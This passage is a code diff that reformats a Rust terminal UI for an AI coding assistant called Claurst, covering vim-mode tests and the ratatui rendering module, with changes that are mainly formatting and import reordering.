     }
 
@@ -3244,7 +4059,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "o", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "o",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(mode, VimMode::Insert);
         assert!(text.contains('\n'));
         assert_eq!(cursor, 6); // after first newline
@@ -3258,7 +4081,15 @@ mod tests {
         let mut yank = String::new();
         let mut pending = VimPendingState::None;
         let mut last_find = None;
-        apply_vim_key(&mut mode, &mut text, &mut cursor, "D", &mut yank, &mut pending, &mut last_find);
+        apply_vim_key(
+            &mut mode,
+            &mut text,
+            &mut cursor,
+            "D",
+            &mut yank,
+            &mut pending,
+            &mut last_find,
+        );
         assert_eq!(text, "hello ");
         assert_eq!(yank, "world");
     }
@@ -3273,7 +4104,7 @@ mod tests {
         s.text = "hello".to_string();
         s.cursor = 5;
         s.vim_command("x"); // deletes 'o' (but cursor at 5 = past end)
-        // let's set cursor to 4 and delete
+                            // let's set cursor to 4 and delete
         s.cursor = 4;
         s.vim_command("x");
         assert_eq!(s.text, "hell");
@@ -3309,7 +4140,10 @@ mod tests {
         s.vim_command("\"");
         s.vim_command("a");
         s.vim_command("y");
-        assert_eq!(s.vim_registers.get(&'a').map(|s| s.as_str()), Some("hello world"));
+        assert_eq!(
+            s.vim_registers.get(&'a').map(|s| s.as_str()),
+            Some("hello world")
+        );
         // `"ap` — paste from register 'a' after cursor
         s.cursor = 0;
         s.vim_command("\"");
@@ -3336,7 +4170,10 @@ mod tests {
         s.vim_command("\"");
         s.vim_command("a");
         s.vim_command("d");
-        assert_eq!(s.vim_registers.get(&'a').map(|s| s.as_str()), Some("hello\n"));
+        assert_eq!(
+            s.vim_registers.get(&'a').map(|s| s.as_str()),
+            Some("hello\n")
+        );
         assert_eq!(s.text, "world");
     }
 
@@ -3403,8 +4240,14 @@ mod tests {
         s.start_macro_recording('q');
         assert_eq!(s.vim_macro_recording, Some('q'));
         // Simulate accumulating keys
-        s.vim_macro_content.get_mut(&'q').unwrap().push("w".to_string());
-        s.vim_macro_content.get_mut(&'q').unwrap().push("e".to_string());
+        s.vim_macro_content
+            .get_mut(&'q')
+            .unwrap()
+            .push("w".to_string());
+        s.vim_macro_content
+            .get_mut(&'q')
+            .unwrap()
+            .push("e".to_string());
         // Stop recording
         let reg = s.stop_macro_recording();
         assert_eq!(reg, Some('q'));
@@ -3450,7 +4293,8 @@ mod tests {
         s.text = "abcdef".to_string();
         s.cursor = 0;
         // Manually record a macro: move 2 chars right
-        s.vim_macro_content.insert('q', vec!["l".to_string(), "l".to_string()]);
+        s.vim_macro_content
+            .insert('q', vec!["l".to_string(), "l".to_string()]);
         // `@q` — replay macro 'q'
         s.vim_command("@");
         assert!(matches!(s.vim_pending, VimPendingState::MacroReplay));

--- a/src-rust/crates/tui/src/render.rs
+++ b/src-rust/crates/tui/src/render.rs
@@ -1,52 +1,51 @@
-﻿// render.rs â€” All ratatui rendering logic.
+// render.rs â€” All ratatui rendering logic.
 
 use std::cell::RefCell;
 
 use crate::agents_view::render_agents_menu;
-use crate::context_viz::render_context_viz;
-use crate::export_dialog::render_export_dialog;
 use crate::app::{App, ContextMenuKind, SystemAnnotation, SystemMessageStyle, ToolStatus};
-use crate::rustle::rustle_lines;
-use crate::diff_viewer::render_diff_dialog;
-use crate::model_picker::render_model_picker;
-use crate::session_browser::render_session_browser;
-use crate::session_branching::render_session_branching;
-use crate::tasks_overlay::render_tasks_overlay;
-use crate::dialogs::{render_mcp_approval_dialog, render_permission_dialog};
-use crate::feedback_survey::render_feedback_survey;
-use crate::overage_upsell::render_overage_upsell;
-use crate::voice_mode_notice::render_voice_mode_notice;
-use crate::desktop_upsell_startup::render_desktop_upsell_startup;
-use crate::memory_update_notification::render_memory_update_notification;
-use crate::invalid_config_dialog::render_invalid_config_dialog;
 use crate::bypass_permissions_dialog::render_bypass_permissions_dialog;
-use crate::onboarding_dialog::render_onboarding_dialog;
-use crate::dialog_select::render_dialog_select;
-use crate::key_input_dialog::render_key_input_dialog;
+use crate::context_viz::render_context_viz;
+use crate::desktop_upsell_startup::render_desktop_upsell_startup;
 use crate::device_auth_dialog::render_device_auth_dialog;
+use crate::dialog_select::render_dialog_select;
+use crate::dialogs::{render_mcp_approval_dialog, render_permission_dialog};
+use crate::diff_viewer::render_diff_dialog;
 use crate::elicitation_dialog::render_elicitation_dialog;
+use crate::export_dialog::render_export_dialog;
+use crate::feedback_survey::render_feedback_survey;
 use crate::figures;
 use crate::hooks_config_menu::render_hooks_config_menu;
+use crate::invalid_config_dialog::render_invalid_config_dialog;
+use crate::key_input_dialog::render_key_input_dialog;
 use crate::mcp_view::render_mcp_view;
 use crate::memory_file_selector::render_memory_file_selector;
+use crate::memory_update_notification::render_memory_update_notification;
 use crate::messages::{
-    render_transcript_assistant_message,
-    render_transcript_assistant_meta, render_transcript_live_text, render_transcript_user_message,
-    RenderContext,
+    render_transcript_assistant_message, render_transcript_assistant_meta,
+    render_transcript_live_text, render_transcript_user_message, RenderContext,
 };
+use crate::model_picker::render_model_picker;
 use crate::notifications::render_notification_banner;
+use crate::onboarding_dialog::render_onboarding_dialog;
+use crate::overage_upsell::render_overage_upsell;
 use crate::overlays::{
     render_global_search, render_help_overlay, render_history_search_overlay, render_rewind_flow,
     CLAURST_ACCENT,
 };
 use crate::plugin_views::render_plugin_hints;
 use crate::privacy_screen::render_privacy_screen;
-use crate::prompt_input::{InputMode, TypeaheadSource, VimMode, input_height, render_prompt_input};
+use crate::prompt_input::{input_height, render_prompt_input, InputMode, TypeaheadSource, VimMode};
+use crate::rustle::rustle_lines;
+use crate::session_branching::render_session_branching;
+use crate::session_browser::render_session_browser;
 use crate::settings_screen::render_settings_screen;
 use crate::stats_dialog::render_stats_dialog;
+use crate::tasks_overlay::render_tasks_overlay;
 use crate::theme_screen::render_theme_screen;
 use crate::transcript_turn::{build_transcript_turns, TranscriptTurn};
 use crate::virtual_list::{VirtualItem, VirtualList};
+use crate::voice_mode_notice::render_voice_mode_notice;
 use claurst_core::constants::APP_VERSION;
 use claurst_core::types::Role;
 use ratatui::buffer::Buffer;
@@ -61,11 +60,15 @@ use unicode_width::UnicodeWidthStr;
 // characters mirrored (forward + reverse) for a smooth pulse effect.
 // Windows uses '*' instead of '✳'/'✽' for better font coverage.
 #[cfg(target_os = "windows")]
-const SPINNER: &[char] = &['\u{00b7}', '\u{2722}', '*', '\u{2736}', '\u{273b}', '\u{273d}',
-                            '\u{273d}', '\u{273b}', '\u{2736}', '*', '\u{2722}', '\u{00b7}'];
+const SPINNER: &[char] = &[
+    '\u{00b7}', '\u{2722}', '*', '\u{2736}', '\u{273b}', '\u{273d}', '\u{273d}', '\u{273b}',
+    '\u{2736}', '*', '\u{2722}', '\u{00b7}',
+];
 #[cfg(not(target_os = "windows"))]
-const SPINNER: &[char] = &['\u{00b7}', '\u{2722}', '\u{2733}', '\u{2736}', '\u{273b}', '\u{273d}',
-                            '\u{273d}', '\u{273b}', '\u{2736}', '\u{2733}', '\u{2722}', '\u{00b7}'];
+const SPINNER: &[char] = &[
+    '\u{00b7}', '\u{2722}', '\u{2733}', '\u{2736}', '\u{273b}', '\u{273d}', '\u{273d}', '\u{273b}',
+    '\u{2736}', '\u{2733}', '\u{2722}', '\u{00b7}',
+];
 const CLAUDE_ORANGE: Color = Color::Rgb(233, 30, 99);
 const WELCOME_BOX_HEIGHT: u16 = 12;
 
@@ -204,7 +207,9 @@ fn startup_notice_lines(app: &App, width: u16) -> Vec<Line<'static>> {
         lines.push(Line::from(vec![
             Span::styled(
                 format!(" {} ", crate::figures::REFERENCE_MARK),
-                Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(CLAUDE_ORANGE)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::styled(
                 truncate_end(summary, max_width),
@@ -216,7 +221,11 @@ fn startup_notice_lines(app: &App, width: u16) -> Vec<Line<'static>> {
     match &app.bridge_state {
         crate::bridge_state::BridgeConnectionState::Connected { peer_count, .. } => {
             let label = if *peer_count > 0 {
-                format!("Remote session active \u{00b7} {} peer{}", peer_count, if *peer_count == 1 { "" } else { "s" })
+                format!(
+                    "Remote session active \u{00b7} {} peer{}",
+                    peer_count,
+                    if *peer_count == 1 { "" } else { "s" }
+                )
             } else {
                 "Remote session active".to_string()
             };
@@ -261,7 +270,12 @@ fn startup_notice_lines(app: &App, width: u16) -> Vec<Line<'static>> {
     //  experience, launch it in a project directory instead."
     if app.home_dir_warning {
         lines.push(Line::from(vec![
-            Span::styled(" note ", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " note ",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled(
                 truncate_end(
                     "You have launched claude in your home directory. \
@@ -387,8 +401,9 @@ pub fn render_app(frame: &mut Frame, app: &App) {
         size,
     );
 
-    let prompt_focused =
-        !app.is_streaming && app.permission_request.is_none() && !app.history_search_overlay.visible;
+    let prompt_focused = !app.is_streaming
+        && app.permission_request.is_none()
+        && !app.history_search_overlay.visible;
     let status_visible = should_render_status_row(app);
     // One blank separator row above the status/input area when status is active,
     // matching the visual breathing room in the TS layout.
@@ -403,7 +418,9 @@ pub fn render_app(frame: &mut Frame, app: &App) {
             // instead of overflowing the input area.  Cap at 3 lines.
             let usable_width = size.width.max(1) as usize;
             let char_count = text.chars().count();
-            ((char_count + usable_width - 1) / usable_width).max(1).min(3) as u16
+            ((char_count + usable_width - 1) / usable_width)
+                .max(1)
+                .min(3) as u16
         } else {
             1
         }
@@ -531,7 +548,12 @@ pub fn render_app(frame: &mut Frame, app: &App) {
     if app.overage_upsell.visible {
         let banner_h = app.overage_upsell.height();
         if size.height > banner_h + 4 {
-            let banner_area = Rect { x: size.x, y: size.y, width: size.width, height: banner_h };
+            let banner_area = Rect {
+                x: size.x,
+                y: size.y,
+                width: size.width,
+                height: banner_h,
+            };
             render_overage_upsell(&app.overage_upsell, banner_area, frame.buffer_mut());
         }
     }
@@ -540,7 +562,12 @@ pub fn render_app(frame: &mut Frame, app: &App) {
     if app.voice_mode_notice.visible {
         let notice_h = app.voice_mode_notice.height();
         if size.height > notice_h + 4 {
-            let notice_area = Rect { x: size.x, y: size.y, width: size.width, height: notice_h };
+            let notice_area = Rect {
+                x: size.x,
+                y: size.y,
+                width: size.width,
+                height: notice_h,
+            };
             render_voice_mode_notice(&app.voice_mode_notice, notice_area, frame.buffer_mut());
         }
     }
@@ -551,7 +578,12 @@ pub fn render_app(frame: &mut Frame, app: &App) {
         if size.height > notif_h + 4 {
             // Place at the bottom of the screen, just above the prompt bar area
             let notif_y = size.y + size.height.saturating_sub(notif_h + 4);
-            let notif_area = Rect { x: size.x, y: notif_y, width: size.width, height: notif_h };
+            let notif_area = Rect {
+                x: size.x,
+                y: notif_y,
+                width: size.width,
+                height: notif_h,
+            };
             render_memory_update_notification(
                 &app.memory_update_notification,
                 notif_area,
@@ -711,12 +743,20 @@ fn apply_selection_highlight(frame: &mut Frame, app: &App) {
     let mut text = String::new();
     let last_row = end.1.min(max_row);
     for row in start.1..=last_row {
-        let col_from = if row == start.1 { start.0 } else { selectable_area.x };
+        let col_from = if row == start.1 {
+            start.0
+        } else {
+            selectable_area.x
+        };
         let col_to = if row == end.1 { end.0 } else { max_col };
         for col in col_from..=col_to {
             if let Some(cell) = buf.cell_mut((col, row)) {
                 let sym = cell.symbol().to_owned();
-                text.push_str(if sym.is_empty() || sym == "\0" { " " } else { &sym });
+                text.push_str(if sym.is_empty() || sym == "\0" {
+                    " "
+                } else {
+                    &sym
+                });
                 // Highlight: white background, black foreground
                 let new_style = Style::default()
                     .fg(Color::Black)
@@ -726,11 +766,15 @@ fn apply_selection_highlight(frame: &mut Frame, app: &App) {
         }
         if row < last_row {
             // Trim trailing spaces from line before newline
-            while text.ends_with(' ') { text.pop(); }
+            while text.ends_with(' ') {
+                text.pop();
+            }
             text.push('\n');
         }
     }
-    while text.ends_with(|c: char| c.is_whitespace()) { text.pop(); }
+    while text.ends_with(|c: char| c.is_whitespace()) {
+        text.pop();
+    }
     *app.selection_text.borrow_mut() = text;
 }
 
@@ -791,20 +835,31 @@ fn render_context_menu(frame: &mut Frame, app: &App) {
             let is_selected = idx == menu.selected_index;
 
             let fg_color = if *enabled {
-                if is_selected { Color::Black } else { Color::White }
+                if is_selected {
+                    Color::Black
+                } else {
+                    Color::White
+                }
             } else {
                 Color::DarkGray
             };
 
             let bg_color = if is_selected {
-                if *enabled { CLAURST_ACCENT } else { Color::Rgb(24, 24, 30) }
+                if *enabled {
+                    CLAURST_ACCENT
+                } else {
+                    Color::Rgb(24, 24, 30)
+                }
             } else {
                 Color::Rgb(24, 24, 30)
             };
 
             let style = Style::default().fg(fg_color).bg(bg_color);
-            let padded_label =
-                format!(" {:<width$} ", label, width = menu_width.saturating_sub(2) as usize);
+            let padded_label = format!(
+                " {:<width$} ",
+                label,
+                width = menu_width.saturating_sub(2) as usize
+            );
 
             if let Some(cell) = frame.buffer_mut().cell_mut((inner.x, y)) {
                 cell.set_symbol(&padded_label[0..1.min(padded_label.len())]);
@@ -815,7 +870,10 @@ fn render_context_menu(frame: &mut Frame, app: &App) {
                 if col_offset >= inner.width as usize {
                     break;
                 }
-                if let Some(cell) = frame.buffer_mut().cell_mut((inner.x + col_offset as u16, y)) {
+                if let Some(cell) = frame
+                    .buffer_mut()
+                    .cell_mut((inner.x + col_offset as u16, y))
+                {
                     cell.set_symbol(&ch.to_string());
                     cell.set_style(style);
                 }
@@ -899,23 +957,31 @@ fn render_messages(frame: &mut Frame, app: &App, area: Rect) {
     // Highlight search matches in transcript when global search is active
     let lines = if app.global_search.open && !app.global_search.query.is_empty() {
         let query_lc = app.global_search.query.to_lowercase();
-        lines.into_iter().map(|mut item| {
-            if item.search_text.to_lowercase().contains(query_lc.as_str()) {
-                // Re-render the line with yellow highlight on matching spans
-                let highlighted_spans: Vec<Span<'static>> = item.line.spans.into_iter().map(|span| {
-                    if span.content.to_lowercase().contains(query_lc.as_str()) {
-                        Span::styled(
-                            span.content,
-                            span.style.bg(Color::Rgb(60, 50, 0)).fg(Color::Yellow),
-                        )
-                    } else {
-                        span
-                    }
-                }).collect();
-                item.line = ratatui::text::Line::from(highlighted_spans);
-            }
-            item
-        }).collect()
+        lines
+            .into_iter()
+            .map(|mut item| {
+                if item.search_text.to_lowercase().contains(query_lc.as_str()) {
+                    // Re-render the line with yellow highlight on matching spans
+                    let highlighted_spans: Vec<Span<'static>> = item
+                        .line
+                        .spans
+                        .into_iter()
+                        .map(|span| {
+                            if span.content.to_lowercase().contains(query_lc.as_str()) {
+                                Span::styled(
+                                    span.content,
+                                    span.style.bg(Color::Rgb(60, 50, 0)).fg(Color::Yellow),
+                                )
+                            } else {
+                                span
+                            }
+                        })
+                        .collect();
+                    item.line = ratatui::text::Line::from(highlighted_spans);
+                }
+                item
+            })
+            .collect()
     } else {
         lines
     };
@@ -924,7 +990,7 @@ fn render_messages(frame: &mut Frame, app: &App, area: Rect) {
     // When auto_scroll is on we always show the tail; otherwise we respect
     // the user's scroll_offset.
     let content_height = lines.len() as u16;
-    let visible_height = msg_area.height;  // no borders, full height available
+    let visible_height = msg_area.height; // no borders, full height available
     let max_scroll = content_height.saturating_sub(visible_height) as usize;
     // scroll_offset counts lines above the bottom (0 = at bottom).
     // ratatui scroll() takes an absolute top-row index, so convert:
@@ -942,7 +1008,12 @@ fn render_messages(frame: &mut Frame, app: &App, area: Rect) {
         .take(msg_area.height as usize)
         .filter_map(|(idx, item)| {
             item.message_index.map(|message_index| {
-                (msg_area.y.saturating_add((idx.saturating_sub(scroll)) as u16), message_index)
+                (
+                    msg_area
+                        .y
+                        .saturating_add((idx.saturating_sub(scroll)) as u16),
+                    message_index,
+                )
             })
         })
         .collect();
@@ -969,8 +1040,8 @@ fn render_messages(frame: &mut Frame, app: &App, area: Rect) {
             .viewport_content_length(visible_height as usize);
 
         let scrollbar = Scrollbar::new(ScrollbarOrientation::VerticalRight)
-            .thumb_style(Style::default().fg(app.accent_color))  // accent thumb
-            .track_style(Style::default().fg(Color::Rgb(40, 40, 50)));  // dark track
+            .thumb_style(Style::default().fg(app.accent_color)) // accent thumb
+            .track_style(Style::default().fg(Color::Rgb(40, 40, 50))); // dark track
 
         frame.render_stateful_widget(scrollbar, msg_area, &mut scrollbar_state);
     }
@@ -980,7 +1051,11 @@ fn render_messages(frame: &mut Frame, app: &App, area: Rect) {
         let indicator = format!(
             " \u{2193} {} new message{} ",
             app.new_messages_while_scrolled,
-            if app.new_messages_while_scrolled == 1 { "" } else { "s" }
+            if app.new_messages_while_scrolled == 1 {
+                ""
+            } else {
+                "s"
+            }
         );
         let ind_len = indicator.len() as u16;
         let ind_x = msg_area
@@ -1092,14 +1167,14 @@ fn append_turn_items(
     if turn.active
         && turn.live_text.is_none()
         && turn.live_thinking.is_none()
-        && turn.tool_blocks.iter().all(|b| b.status != ToolStatus::Running)
+        && turn
+            .tool_blocks
+            .iter()
+            .all(|b| b.status != ToolStatus::Running)
     {
         let mut spans = vec![Span::raw("  ")];
         spans.extend(shimmer_spans("Thinking", frame_count));
-        sections.push((
-            vec![Line::from(spans)],
-            Some(turn.primary_message_index()),
-        ));
+        sections.push((vec![Line::from(spans)], Some(turn.primary_message_index())));
     }
 
     if let Some(text) = turn.live_text {
@@ -1132,9 +1207,8 @@ fn append_turn_items(
 }
 
 fn render_message_items(app: &App, width: u16) -> Vec<RenderedLineItem> {
-    let streaming = app.is_streaming
-        || !app.streaming_text.is_empty()
-        || !app.streaming_thinking.is_empty();
+    let streaming =
+        app.is_streaming || !app.streaming_text.is_empty() || !app.streaming_thinking.is_empty();
     let has_running_tool_blocks = app
         .tool_use_blocks
         .iter()
@@ -1182,7 +1256,11 @@ fn render_message_items(app: &App, width: u16) -> Vec<RenderedLineItem> {
         let total = app.messages.len();
         let mut index = 0usize;
         while index <= total {
-            for ann in app.system_annotations.iter().filter(|ann| ann.after_index == index) {
+            for ann in app
+                .system_annotations
+                .iter()
+                .filter(|ann| ann.after_index == index)
+            {
                 let mut lines = Vec::new();
                 render_system_annotation_lines(&mut lines, ann, width as usize);
                 push_rendered_items(&mut items, lines, None, false);
@@ -1300,13 +1378,26 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
     if area.height < box_height || box_width < 30 {
         // Too small: fall back to a single line
         let line = Line::from(vec![
-            Span::styled("Claurst ", Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD)),
-            Span::styled(format!("v{}", APP_VERSION), Style::default().fg(Color::DarkGray)),
+            Span::styled(
+                "Claurst ",
+                Style::default()
+                    .fg(CLAUDE_ORANGE)
+                    .add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                format!("v{}", APP_VERSION),
+                Style::default().fg(Color::DarkGray),
+            ),
         ]);
         frame.render_widget(Paragraph::new(vec![line]), area);
         return;
     }
-    let box_area = Rect { x: area.x, y: area.y, width: box_width, height: box_height };
+    let box_area = Rect {
+        x: area.x,
+        y: area.y,
+        width: box_width,
+        height: box_height,
+    };
 
     // Outer border with title "Claurst vX.Y"
     let accent = app.accent_color;
@@ -1315,8 +1406,14 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
         .border_type(BorderType::Rounded)
         .border_style(Style::default().fg(accent))
         .title(Line::from(vec![
-            Span::styled(" Claurst ", Style::default().fg(accent).add_modifier(Modifier::BOLD)),
-            Span::styled(format!("v{} ", APP_VERSION), Style::default().fg(Color::DarkGray)),
+            Span::styled(
+                " Claurst ",
+                Style::default().fg(accent).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                format!("v{} ", APP_VERSION),
+                Style::default().fg(Color::DarkGray),
+            ),
         ]));
     frame.render_widget(outer_block, box_area);
 
@@ -1330,7 +1427,10 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
 
     // Split inner into left | divider(1) | right
     // Left width: ~28 chars or half the inner width, whichever is smaller
-    let left_w = (inner.width / 2).max(22).min(32).min(inner.width.saturating_sub(3));
+    let left_w = (inner.width / 2)
+        .max(22)
+        .min(32)
+        .min(inner.width.saturating_sub(3));
     let right_w = inner.width.saturating_sub(left_w + 1);
     let h_chunks = Layout::default()
         .direction(Direction::Horizontal)
@@ -1361,7 +1461,9 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
     let mut left_lines: Vec<Line> = Vec::new();
     left_lines.push(Line::from(Span::styled(
         welcome_msg,
-        Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::White)
+            .add_modifier(Modifier::BOLD),
     )));
     left_lines.push(Line::from(""));
     // Center mascot in left column
@@ -1394,7 +1496,10 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
         Style::default().fg(Color::DarkGray),
     )));
 
-    frame.render_widget(Paragraph::new(left_lines).wrap(Wrap { trim: false }), h_chunks[0]);
+    frame.render_widget(
+        Paragraph::new(left_lines).wrap(Wrap { trim: false }),
+        h_chunks[0],
+    );
 
     // --- Right column ---
     let tip_text = claurst_core::tips::select_tip(0)
@@ -1408,7 +1513,11 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
     )));
     // Word-wrap the tip text into the right column width
     let right_w_usize = right_w.saturating_sub(1) as usize;
-    for chunk in tip_text.chars().collect::<Vec<_>>().chunks(right_w_usize.max(1)) {
+    for chunk in tip_text
+        .chars()
+        .collect::<Vec<_>>()
+        .chunks(right_w_usize.max(1))
+    {
         right_lines.push(Line::from(chunk.iter().collect::<String>()));
     }
     right_lines.push(Line::from(""));
@@ -1421,14 +1530,19 @@ fn render_welcome_box(frame: &mut Frame, app: &App, area: Rect) {
         Style::default().fg(Color::DarkGray),
     )));
 
-    frame.render_widget(Paragraph::new(right_lines).wrap(Wrap { trim: false }), h_chunks[2]);
+    frame.render_widget(
+        Paragraph::new(right_lines).wrap(Wrap { trim: false }),
+        h_chunks[2],
+    );
 }
 
 // â”€â”€ Per-message rendering â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 
 /// Build a tool_use_id → tool_name lookup from all messages in the transcript.
 /// This allows ToolResult blocks to dispatch to tool-specific renderers.
-fn build_tool_names(messages: &[claurst_core::types::Message]) -> std::collections::HashMap<String, String> {
+fn build_tool_names(
+    messages: &[claurst_core::types::Message],
+) -> std::collections::HashMap<String, String> {
     let mut map = std::collections::HashMap::new();
     for msg in messages {
         for block in msg.content_blocks() {
@@ -1488,24 +1602,28 @@ fn render_system_annotation_lines(
             format!("\u{2500} {} \u{2500}", text),
             Style::default().fg(text_color).add_modifier(Modifier::DIM),
         ),
-        Span::styled(
-            "\u{2500}".repeat(right),
-            Style::default().fg(border_color),
-        ),
+        Span::styled("\u{2500}".repeat(right), Style::default().fg(border_color)),
     ]));
     lines.push(Line::from(""));
 }
 
 // â”€â”€ Tool use block â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 
-fn render_tool_block_lines(lines: &mut Vec<Line<'static>>, block: &crate::app::ToolUseBlock, frame_count: u64) {
+fn render_tool_block_lines(
+    lines: &mut Vec<Line<'static>>,
+    block: &crate::app::ToolUseBlock,
+    frame_count: u64,
+) {
     let input_val: serde_json::Value =
         serde_json::from_str(&block.input_json).unwrap_or(serde_json::Value::Null);
     let normalized = block.name.to_ascii_lowercase();
     let running = block.status == ToolStatus::Running;
     let mut summary = crate::messages::extract_tool_summary(&block.name, &input_val);
     let title = if normalized == "task" || normalized == "agent" {
-        if let Some(description) = input_val.get("description").and_then(|value| value.as_str()) {
+        if let Some(description) = input_val
+            .get("description")
+            .and_then(|value| value.as_str())
+        {
             summary = description.to_string();
         }
         crate::messages::subagent_title(&input_val)
@@ -1536,14 +1654,21 @@ fn render_tool_block_lines(lines: &mut Vec<Line<'static>>, block: &crate::app::T
     } else {
         CLAUDE_ORANGE
     };
-    let mut header_spans = vec![Span::styled("   ~ ".to_string(), Style::default().fg(accent))];
+    let mut header_spans = vec![Span::styled(
+        "   ~ ".to_string(),
+        Style::default().fg(accent),
+    )];
     if running {
         header_spans.extend(shimmer_spans(&title, frame_count));
     } else {
         header_spans.push(Span::styled(
             title,
             Style::default()
-                .fg(if block.status == ToolStatus::Error { accent } else { Color::White })
+                .fg(if block.status == ToolStatus::Error {
+                    accent
+                } else {
+                    Color::White
+                })
                 .add_modifier(Modifier::BOLD),
         ));
     }
@@ -1573,10 +1698,7 @@ fn render_tool_block_lines(lines: &mut Vec<Line<'static>>, block: &crate::app::T
             };
             lines.push(Line::from(vec![
                 Span::styled("     $ ".to_string(), Style::default().fg(Color::Green)),
-                Span::styled(
-                    display,
-                    Style::default().fg(Color::White),
-                ),
+                Span::styled(display, Style::default().fg(Color::White)),
             ]));
         }
     }
@@ -1637,15 +1759,19 @@ fn render_input(frame: &mut Frame, app: &App, area: Rect, focused: bool) {
         let dim = Color::Rgb(110, 110, 124);
         let chunks = Layout::default()
             .direction(Direction::Horizontal)
-            .constraints([Constraint::Min(1), Constraint::Length(status_area.width.min(36))])
+            .constraints([
+                Constraint::Min(1),
+                Constraint::Length(status_area.width.min(36)),
+            ])
             .split(status_area);
 
         let left_line = if app.has_credentials {
-            let (provider, model_short) = if let Some((provider, model)) = app.model_name.split_once('/') {
-                (provider.to_string(), model.to_string())
-            } else {
-                ("local".to_string(), app.model_name.clone())
-            };
+            let (provider, model_short) =
+                if let Some((provider, model)) = app.model_name.split_once('/') {
+                    (provider.to_string(), model.to_string())
+                } else {
+                    ("local".to_string(), app.model_name.clone())
+                };
             let mut spans = vec![
                 Span::styled(
                     format!(" {} ", agent_mode.to_uppercase()),
@@ -1657,7 +1783,9 @@ fn render_input(frame: &mut Frame, app: &App, area: Rect, focused: bool) {
                 Span::raw(" "),
                 Span::styled(
                     model_short,
-                    Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::White)
+                        .add_modifier(Modifier::BOLD),
                 ),
             ];
             spans.push(Span::styled(
@@ -1694,7 +1822,10 @@ fn render_input(frame: &mut Frame, app: &App, area: Rect, focused: bool) {
             }
             Line::from(hint)
         } else {
-            Line::from(vec![Span::styled("Ctrl+K commands", Style::default().fg(dim))])
+            Line::from(vec![Span::styled(
+                "Ctrl+K commands",
+                Style::default().fg(dim),
+            )])
         };
 
         frame.render_widget(Paragraph::new(vec![left_line]), chunks[0]);
@@ -1745,14 +1876,19 @@ fn render_status_row(frame: &mut Frame, app: &App, area: Rect) {
 
     let spans = if app.voice_recording {
         vec![Span::styled(
-            format!("{} Recording... press Alt+V to transcribe", figures::black_circle()),
+            format!(
+                "{} Recording... press Alt+V to transcribe",
+                figures::black_circle()
+            ),
             Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
         )]
     } else if app.is_streaming {
         // Pick a label: use the status message if it has real content,
         // otherwise show a default "Thinking" shimmer so the user always
         // sees that the model is working.
-        let raw_label = app.status_message.as_deref()
+        let raw_label = app
+            .status_message
+            .as_deref()
             .filter(|s| {
                 let t = s.trim();
                 !t.is_empty()
@@ -1764,21 +1900,30 @@ fn render_status_row(frame: &mut Frame, app: &App, area: Rect) {
 
         let mut s = vec![Span::styled(
             spinner_char(app.frame_count).to_string(),
-            Style::default().fg(spinner_color(app)).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(spinner_color(app))
+                .add_modifier(Modifier::BOLD),
         )];
         let label = format!("{}…", raw_label.trim_end_matches('…'));
 
         s.push(Span::raw(" "));
         s.extend(shimmer_spans(&label, app.frame_count));
         s
-    } else if let (Some(verb), Some(elapsed)) = (app.last_turn_verb, app.last_turn_elapsed.as_deref()) {
+    } else if let (Some(verb), Some(elapsed)) =
+        (app.last_turn_verb, app.last_turn_elapsed.as_deref())
+    {
         // "✽ Worked for 2m 5s" — mirrors TS TeammateSpinnerLine idle state
         vec![Span::styled(
             format!("{} {} for {}", figures::TEARDROP_ASTERISK, verb, elapsed),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::DIM),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::DIM),
         )]
     } else if let Some(status) = app.status_message.as_deref() {
-        vec![Span::styled(status.to_string(), Style::default().fg(Color::DarkGray))]
+        vec![Span::styled(
+            status.to_string(),
+            Style::default().fg(Color::DarkGray),
+        )]
     } else {
         Vec::new()
     };
@@ -1788,8 +1933,7 @@ fn render_status_row(frame: &mut Frame, app: &App, area: Rect) {
     }
 
     frame.render_widget(
-        Paragraph::new(Line::from(spans))
-            .wrap(ratatui::widgets::Wrap { trim: false }),
+        Paragraph::new(Line::from(spans)).wrap(ratatui::widgets::Wrap { trim: false }),
         area,
     );
 }
@@ -1826,7 +1970,10 @@ fn shimmer_spans(text: &str, frame_count: u64) -> Vec<Span<'static>> {
             && glimmer_center < len as isize;
 
         if is_bright != run_bright && !run.is_empty() {
